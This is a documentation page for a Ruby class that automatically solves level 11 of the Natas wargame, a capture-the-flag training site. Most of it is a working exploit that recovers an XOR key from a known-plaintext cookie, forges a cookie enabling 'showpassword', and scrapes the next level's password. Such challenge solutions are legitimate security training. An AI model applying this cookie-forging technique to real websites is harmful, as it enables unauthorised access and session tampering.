class NatasLevel11

Level 11

Constants

DEFAULT_DATA
LEVEL
PAGE

Public Instance Methods

exec() click to toggle source
# File lib/natas.rb, line 349
def exec
  log("Getting the Cookie HTTP header from the page: #{PAGE}")
  response = get(PAGE)
  cookie = response['Set-Cookie']
  data = cookie.split('=')[1]
  data = URI.decode_www_form_component(data)
  log("Data: #{data}")

  log('Searching the XOR encryption key')
  key = xor_encrypt(
    Base64.strict_decode64(data),
    JSON.generate(DEFAULT_DATA)
  )
  log("Key found: #{key}")
  log('Searching a pattern of the key')
  pattern = String.new
  key.chars.each_with_index do |c, i|
    pattern << c
    break if pattern == key[(i + 1)..(i + pattern.length)]
  end
  log("Pattern found: #{pattern}")
  key = pattern

  data = DEFAULT_DATA.dup
  data['showpassword'] = 'yes'
  data = JSON.generate(data)
  log("Encrypting of new data: #{data}")
  data = xor_encrypt(
    data,
    key
  )

  data = "data=#{Base64.strict_encode64(data)}"
  log("Setting the new Cookie HTTP header: #{data}")
  log("Parsing the page: #{PAGE}")
  data = get(
    PAGE,
    {
      'Cookie' => data
    }
  ).body
  match = /The password for natas12 is (\w{32})<br>/.match(data)
  not_found unless match
  found(match[1])
end
xor_encrypt(data, key) click to toggle source
# File lib/natas.rb, line 341
def xor_encrypt(data, key)
  out = String.new
  data.chars.each_with_index do |c, i|
    out << (c.ord ^ key[i % key.length].ord).chr
  end
  out
end